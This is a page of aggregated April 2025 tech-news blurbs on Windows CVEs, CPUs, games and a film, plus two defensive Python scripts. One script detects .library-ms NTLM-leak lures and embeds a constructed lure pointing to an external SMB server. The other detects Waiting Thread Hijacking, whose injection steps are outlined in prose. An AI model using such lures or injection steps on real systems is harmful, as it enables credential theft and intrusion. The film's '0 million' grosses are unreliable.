
Winsage
April 23, 2025
CVE-2025-21204 is an elevation-of-privilege vulnerability in the Windows Update Stack: improper link resolution before file access (link following) lets a low-privileged local attacker have a privileged update component operate on attacker-controlled paths and run code as SYSTEM. It is a local issue with a CVSS 3.1 base score of 7.8 (High); it is not reached by supplying a malicious update package or by acting as man-in-the-middle on the network. Any Windows edition using the affected update mechanism, enterprise or consumer, is in scope. Microsoft fixed it in the April 2025 security updates, which also pre-create a C:\inetpub directory as part of the mitigation; that folder should be left in place. Organizations should apply the updates promptly, keep update traffic restricted to approved servers, and monitor for unexpected file or process activity by the update components.
Tech Optimizer
April 21, 2025
The server-class CPU market is primarily dominated by AMD and Intel, both of which offer dedicated lines of CPUs for server applications. AMD's EPYC processors compete with Intel's Xeon line (Threadripper is AMD's high-end desktop and workstation part, not its server line), with AMD often providing higher core counts that enhance performance for multi-threaded applications. The price-to-performance ratios of both manufacturers are relatively comparable, but each has unique strengths. Prospective buyers are encouraged to research using resources like AnandTech, Tom's Hardware, and the official sites of Intel and AMD for benchmarks and comparative analyses.
AppWizard
April 19, 2025
Players speculate that the protagonist of Gloomwood may be named 'Jekyll' following the recent Research update. This update introduces a new laboratory setting where players can synthesize a cure for a plague and conduct ethically ambiguous research to create serums that allow transformation into monstrous forms. These serums enable players to blend in with hostile creatures for stealth advantages. The update expands gameplay possibilities, moving away from the initial concept of a 'Thief with guns' towards abilities reminiscent of those in Dishonored, though the abilities are one-time-use rather than permanent. The doctor's journal has been enhanced with new artwork, soundscapes, and animations. Players will access the research mechanics upon reaching the game's mirror realm, with future updates expected to roll out in the summer months.
AppWizard
April 18, 2025
Sony's exclusives on PlayStation hardware are known for their seamless performance, but PC ports can vary in quality. The Last of Us Part 2 Remastered has been released on PC, offering a polished experience and various customizable graphics settings, including level of detail, texture quality, shadow quality, NVIDIA Reflex Low Latency, AMD Anti-Lag 2, and upscaling technologies like NVIDIA DLSS, AMD FSR, and Intel XeSS. While the gameplay experience is generally smooth, some minor graphical glitches may occur. The game has received patches since launch to improve performance. It retains a stunning aesthetic, enhanced by modern PC capabilities, making it a worthwhile investment for both newcomers and those who have played it on PS4 or PS5. Players are encouraged to check their system's specifications to ensure compatibility for an optimal experience.
AppWizard
April 18, 2025
Warner Bros. Pictures' marketing strategy for A Minecraft Movie focused on engaging the existing fan base and appealing to younger audiences. The campaign included interactive social media experiences, tactile billboards, and cast appearances at gaming events. The film grossed 0 million globally and over 0 million in North America within two weeks of release. The marketing involved collaborations with brands like McDonald's and Adidas, targeting Generation Z, which made up 64% of the audience during the opening weekend. Local-language influencers voiced characters in dubbed versions, and the campaign adapted based on audience feedback. The world premiere occurred in London on March 30, followed by a premiere in Mexico on April 3, generating significant excitement and engagement.
Winsage
April 17, 2025
A vulnerability in Windows, identified as CVE-2025-24054, is being actively exploited in phishing campaigns targeting government and private sectors. Initially addressed in Microsoft's March 2025 Patch Tuesday, it was not considered actively exploited at that time. Researchers from Check Point reported increased exploitation activity shortly after the patches were released, particularly between March 20 and 25, 2025. Some attacks were linked to the Russian state-sponsored group APT28, but definitive attribution is lacking. The vulnerability lets attackers capture NTLMv2 authentication responses (Net-NTLMv2 hashes): phishing emails carry manipulated .library-ms files that make Windows Explorer open an SMB connection to an attacker-controlled server as soon as the file is handled. Check Point noted that later waves sent the .library-ms files directly rather than inside an archive, so that merely viewing or selecting the file was enough to trigger the leak. The malicious packages also included additional components that exploit older NTLM hash-leak vulnerabilities. The attacker-controlled SMB servers were traced to specific IP addresses. Although rated as medium severity, the captured responses can be cracked offline or relayed to reach authentication bypass and privilege escalation, which makes it a significant concern; organizations are advised to install the updates, disable NTLM authentication where it is not required, and block outbound SMB (TCP 445) at the network edge so leaked responses cannot reach servers on the internet.
Winsage
April 17, 2025
Cybercriminals are exploiting a vulnerability in Windows systems known as CVE-2025-24054, an NTLM hash disclosure through spoofing. The flaw leaks NTLM authentication material that can then be used for privilege escalation and lateral movement within networks. It is triggered when a user extracts a ZIP archive containing a malicious .library-ms file, causing Windows Explorer to initiate an SMB authentication request to the path embedded in the file and thereby expose NTLMv2-SSP responses. Exploitation began shortly after the security patch was released on March 11, 2025, with campaigns targeting government and private institutions in Poland and Romania. These campaigns used spear-phishing emails containing malicious ZIP archives which, when handled, leaked NTLM responses. The archives bundled several file types designed to initiate SMB connections to attacker-controlled servers. The captured Net-NTLMv2 responses are not directly usable for pass-the-hash (that requires NT hashes); they are cracked offline to recover passwords or relayed to other services that accept NTLM, which is how the attackers escalate privileges. The stolen responses were sent to servers in several countries, indicating potential links to state-sponsored groups. One campaign involved Dropbox links that exploited the vulnerability upon user interaction. Microsoft has recommended immediate patching, enhancing network defenses, user education, network segmentation, and regular security audits to mitigate risks associated with this vulnerability.
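Both CVE-2025-24054 items above describe the same lure: a .library-ms file whose search-connector location is a UNC path on an attacker-controlled server. The Python below is an added triage helper, not code from Check Point, Microsoft, or the aggregated articles. It opens a ZIP attachment in memory, parses every .library-ms member, pulls out the location URLs and flags any UNC path that points outside the organisation. The sample archive and library file are constructed; the internal DNS suffix `.corp.example` and the `INTERNAL_NETS` list are assumed values to adapt. It also strips the `@80` / `@SSL@443` decoration attackers use to force WebDAV, a generalisation beyond what the articles mention.

```python
"""Triage .library-ms lures inside ZIP attachments (constructed example)."""
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace of Windows Library Description (.library-ms) documents.
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# \\host\share... : capture the host component of a UNC path.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Assumed in-scope address space and DNS suffix; adjust for your environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "fc00::/7", "::1/128")]
INTERNAL_SUFFIXES = (".corp.example",)  # hypothetical internal suffix

# Constructed lure: the only library location is an external SMB server
# (TEST-NET-3 address stands in for a real public IP).
SAMPLE_LIBRARY_MS = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.10\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def library_ms_targets(xml_bytes):
    """Return every location <url> declared in a .library-ms document."""
    root = ET.fromstring(xml_bytes)
    return [u.text.strip() for u in root.iter(LIB_NS + "url") if u.text]


def is_external_unc(path):
    """True when a UNC path would make Explorer authenticate to a host
    outside INTERNAL_NETS / INTERNAL_SUFFIXES. Non-UNC paths are ignored."""
    m = UNC_RE.match(path)
    if not m:
        return False
    # \\host@80\ and \\host@SSL@443\ force WebDAV; drop the port decoration.
    host = m.group(1).split("@")[0].rstrip(".").lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Bare NetBIOS names resolve on the LAN; FQDNs outside our suffixes do not.
        return "." in host and not host.endswith(INTERNAL_SUFFIXES)
    return not any(ip in net for net in INTERNAL_NETS)


def triage_zip(zip_bytes):
    """Scan a ZIP held in memory; one finding per library location."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                urls = library_ms_targets(zf.read(info))
            except ET.ParseError:
                # Malformed XML is itself worth a look; record it and move on.
                findings.append({"member": info.filename, "url": None, "external": None})
                continue
            for url in urls:
                findings.append({"member": info.filename, "url": url,
                                 "external": is_external_unc(url)})
    return findings


def build_sample_zip():
    """Constructed attachment: lure plus a decoy text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.library-ms", SAMPLE_LIBRARY_MS)
        zf.writestr("readme.txt", b"constructed decoy")
    return buf.getvalue()


if __name__ == "__main__":
    for f in triage_zip(build_sample_zip()):
        print(f)
```

Run it on a quarantined attachment by replacing `build_sample_zip()` with the file's bytes. A hit with `external: True` means opening or even rendering the archive contents would send the user's Net-NTLMv2 response to that host, which is exactly the telemetry to pair with outbound TCP 445 denies at the perimeter.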
Tech Optimizer
April 15, 2025
Check Point Research has described a new process injection technique called "Waiting Thread Hijacking" (WTH), which runs attacker code inside a legitimate process while avoiding the API calls that security products watch most closely. It is a variant of classic Thread Execution Hijacking with a different sequence of operations. WTH allocates memory in the target and writes the payload with the usual functions (VirtualAllocEx and WriteProcessMemory), enumerates the target's threads to find one blocked in a wait state, reads that thread's context with GetThreadContext (which needs only THREAD_GET_CONTEXT, not the SET_CONTEXT right classic hijacking requires), locates the return address the waiting thread will use when its wait completes, and overwrites that stack slot with the address of the injected shellcode. No thread is suspended, resumed, or created and no context is written back. The shellcode preserves the registers and stack it found, so the thread resumes its normal work once the payload has run. As a further evasion, the steps can be spread across several child processes so that no single process performs the whole sequence that behavioral detections look for. WTH is not immune to detection: some Endpoint Detection and Response (EDR) products block the cross-process memory writes on which it still depends. Check Point observed that WTH succeeds against some EDRs while others block it yet miss older techniques, illustrating how much EDR coverage varies.
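The distinguishing signal in the description above is what WTH does not do: it never calls SetThreadContext or ResumeThread, but it still has to allocate executable memory in the target, write a payload into it, and then make a pointer-sized write into a stack region of the same process. The Python below is an added detection sketch, not Check Point's code, that correlates those steps per target process over a constructed API-telemetry feed. The line format (`ts pid=... op=... target_pid=...`), the `region=stack` annotation and the PIDs are all assumed; real EDR telemetry will need its own parser. Keying on the target rather than the source PID is what lets it catch the variant that spreads the steps across child processes.

```python
"""Correlate cross-process API telemetry into injection findings (constructed example)."""
from collections import defaultdict

# Constructed telemetry. Three scenarios: WTH split across PIDs 4120/4121
# against 2288, classic thread hijacking by 5000 against 2290, and a benign
# non-executable write by 6000 into 7000.
SAMPLE_EVENTS = """\
1001 pid=4120 op=VirtualAllocEx target_pid=2288 addr=0x1c0000 size=0x1000 prot=PAGE_EXECUTE_READWRITE
1002 pid=4120 op=WriteProcessMemory target_pid=2288 addr=0x1c0000 size=0x200 region=private
1003 pid=4121 op=OpenThread target_pid=2288 tid=3300 access=THREAD_GET_CONTEXT|THREAD_QUERY_INFORMATION
1004 pid=4121 op=GetThreadContext target_pid=2288 tid=3300
1005 pid=4121 op=WriteProcessMemory target_pid=2288 addr=0x7ffe5c1f8 size=0x8 region=stack
1010 pid=5000 op=VirtualAllocEx target_pid=2290 addr=0x2d0000 size=0x1000 prot=PAGE_EXECUTE_READWRITE
1011 pid=5000 op=WriteProcessMemory target_pid=2290 addr=0x2d0000 size=0x200 region=private
1012 pid=5000 op=SuspendThread target_pid=2290 tid=3301
1013 pid=5000 op=SetThreadContext target_pid=2290 tid=3301
1014 pid=5000 op=ResumeThread target_pid=2290 tid=3301
1020 pid=6000 op=VirtualAllocEx target_pid=7000 addr=0x300000 size=0x1000 prot=PAGE_READWRITE
1021 pid=6000 op=WriteProcessMemory target_pid=7000 addr=0x300000 size=0x100 region=private
"""

POINTER_BYTES = 8  # x64; a return-address overwrite is a single pointer


def parse_events(text):
    """Parse 'ts key=value ...' lines into dicts; PIDs/TIDs become ints."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = {"ts": int(ts)}
        for field in fields:
            k, v = field.split("=", 1)
            ev[k] = int(v) if k in ("pid", "target_pid", "tid") else v
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(events):
    """Return one finding per target process that received an injected
    payload, labelled by how control was transferred to it."""
    by_target = defaultdict(list)
    for ev in events:
        by_target[ev["target_pid"]].append(ev)

    findings = []
    for target, evs in by_target.items():
        exec_allocs = {}          # base -> size of executable allocations
        payload_written = False   # a write landed inside such an allocation
        stack_write = False       # pointer-sized write into a stack region afterwards
        set_context = False       # classic hijack writes the context back
        get_context_only = False  # WTH opens the thread with GET_CONTEXT only
        sources = set()
        for ev in evs:
            sources.add(ev["pid"])
            op = ev["op"]
            if op == "VirtualAllocEx" and "EXECUTE" in ev.get("prot", ""):
                exec_allocs[int(ev["addr"], 16)] = int(ev["size"], 16)
            elif op == "WriteProcessMemory":
                addr, size = int(ev["addr"], 16), int(ev["size"], 16)
                if any(b <= addr < b + s for b, s in exec_allocs.items()):
                    payload_written = True
                elif ev.get("region") == "stack" and payload_written and size <= 2 * POINTER_BYTES:
                    stack_write = True
            elif op == "OpenThread" and "SET_CONTEXT" not in ev.get("access", ""):
                get_context_only = True
            elif op == "SetThreadContext":
                set_context = True

        if payload_written and set_context:
            technique = "thread_execution_hijacking"
        elif payload_written and stack_write:
            technique = "waiting_thread_hijacking"
        else:
            continue
        findings.append({"target_pid": target, "technique": technique,
                         "sources": sorted(sources),
                         "get_context_only": get_context_only})
    return findings


if __name__ == "__main__":
    for finding in detect(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The benign scenario produces nothing because the allocation is PAGE_READWRITE; a real deployment would also need to treat a later VirtualProtectEx to an executable protection as making the region executable, and would scope the target-keyed correlation to a process tree so two unrelated tools touching the same process are not merged.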